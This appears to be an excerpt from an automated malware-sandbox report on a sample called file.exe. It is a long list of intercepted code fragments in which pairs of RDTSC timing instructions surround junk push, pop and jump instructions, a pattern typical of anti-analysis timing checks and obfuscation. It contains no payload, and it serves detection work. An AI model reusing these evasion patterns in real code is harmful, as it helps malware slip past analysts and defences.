Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3F89 second address: FD3F97 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3F97 second address: FD3FA1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFB34C126B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3FA1 second address: FD3FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026996 second address: 10269A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jnp 00007FFB34C126B6h 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10269A9 second address: 10269AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10269AF second address: 10269B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026B04 second address: 1026B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026B0A second address: 1026B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C6h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FFB34C126BBh 0x00000017 jp 00007FFB34C126B6h 0x0000001d jmp 00007FFB34C126C6h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8DAEF second address: F8DB06 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFB34E3B6CEh 0x00000008 jp 00007FFB34E3B6C6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F1AA second address: 102F1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102FA08 second address: 102FA13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103005E second address: 103006A instructions: 0x00000000 rdtsc 0x00000002 je 00007FFB34C126BEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10302E4 second address: 1030325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FFB34E3B6D6h 0x00000011 jmp 00007FFB34E3B6CBh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030325 second address: 1030331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FFB34C126B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030331 second address: 1030335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030E5D second address: 1030E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030E6B second address: 1030E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1034170 second address: 1034176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103430E second address: 1034319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1034319 second address: 1034323 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFB34C126B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10345D8 second address: 10345DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10345DC second address: 10345E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10345E0 second address: 10345E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1034885 second address: 103489E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FFB34C126BCh 0x0000000a jbe 00007FFB34C126BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10349F8 second address: 1034A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 js 00007FFB34E3B6C6h 0x0000000c jmp 00007FFB34E3B6CAh 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1034A0F second address: 1034A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1039A28 second address: 1039A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 jnp 00007FFB34E3B6C6h 0x0000000d jc 00007FFB34E3B6C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10419F8 second address: 10419FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10419FC second address: 1041A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1041A02 second address: 1041A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FFB34C126BEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104026A second address: 104026F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104026F second address: 1040291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34C126C0h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jc 00007FFB34C126B6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1040420 second address: 1040436 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FFB34E3B6CCh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1040436 second address: 1040440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1040440 second address: 1040448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1040AC7 second address: 1040AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FFB34C126B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1040AD1 second address: 1040AEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1040AEE second address: 1040AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1048CDD second address: 1048CE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FFB34E3B6C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1048CE9 second address: 1048CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FFB34C126C2h 0x0000000c jl 00007FFB34C126B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1048E52 second address: 1048E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6CFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1048E67 second address: 1048E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1048E6B second address: 1048E8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFB34E3B6CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FFB34E3B6CEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1048FD1 second address: 1048FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FFB34C126B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10564E0 second address: 1056515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34E3B6D2h 0x00000009 jmp 00007FFB34E3B6D4h 0x0000000e popad 0x0000000f jmp 00007FFB34E3B6CAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1057ED6 second address: 1057EF9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 ja 00007FFB34C126C6h 0x0000000c jmp 00007FFB34C126C0h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105DA42 second address: 105DA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 jmp 00007FFB34E3B6D0h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop esi 0x0000000f jmp 00007FFB34E3B6D5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D640 second address: 105D64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D64B second address: 105D64F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D64F second address: 105D65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FFB34C126B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B77A second address: 106B795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6D1h 0x00000009 jns 00007FFB34E3B6C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10745F4 second address: 10745FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10745FD second address: 1074602 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072D56 second address: 1072D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34C126BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072EE7 second address: 1072EEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072EEC second address: 1072EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FFB34C126B6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072EFD second address: 1072F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072F01 second address: 1072F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072F11 second address: 1072F3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D9h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jl 00007FFB34E3B6C6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072F3C second address: 1072F5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007FFB34C126B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10730E2 second address: 10730E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10732EB second address: 1073300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FFB34C126BCh 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1073300 second address: 1073323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D6h 0x00000007 jg 00007FFB34E3B6C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1073323 second address: 1073345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34C126BCh 0x00000009 jmp 00007FFB34C126BBh 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1073345 second address: 1073349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107432E second address: 107433C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFB34C126B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107433C second address: 107434C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6CAh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1078BB3 second address: 1078BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007FFB34C126B6h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1078BC1 second address: 1078BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D3h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1078BDA second address: 1078BFD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFB34C126CEh 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10788F6 second address: 10788FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10788FC second address: 1078900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 108553E second address: 1085543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F822C1 second address: F822C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089B9D second address: 1089BAF instructions: 0x00000000 rdtsc 0x00000002 je 00007FFB34E3B6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FFB34E3B6C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089BAF second address: 1089BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089BB3 second address: 1089BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFB34E3B6D6h 0x0000000f jnl 00007FFB34E3B6C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089BD9 second address: 1089C00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jno 00007FFB34C126BEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089C00 second address: 1089C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097D0D second address: 1097D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097D18 second address: 1097D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097D1C second address: 1097D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097D20 second address: 1097D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109783F second address: 109784B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FFB34C126B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109784B second address: 109785D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFB34E3B6CBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109785D second address: 1097869 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFB34C126B6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097869 second address: 1097871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097871 second address: 1097875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097875 second address: 109787B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109787B second address: 10978A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jns 00007FFB34C126B6h 0x00000011 pushad 0x00000012 popad 0x00000013 jbe 00007FFB34C126B6h 0x00000019 jmp 00007FFB34C126C4h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10978A9 second address: 10978B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10978B1 second address: 10978C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10979F4 second address: 10979F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10979F9 second address: 1097A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0228 second address: 10B0257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D7h 0x00000007 jmp 00007FFB34E3B6D0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0257 second address: 10B0261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFB34C126B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0261 second address: 10B0282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFB34E3B6D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0282 second address: 10B0293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 je 00007FFB34C126BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0564 second address: 10B056F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFB34E3B6C6h 0x0000000a popad 0x0000000b rdtsc
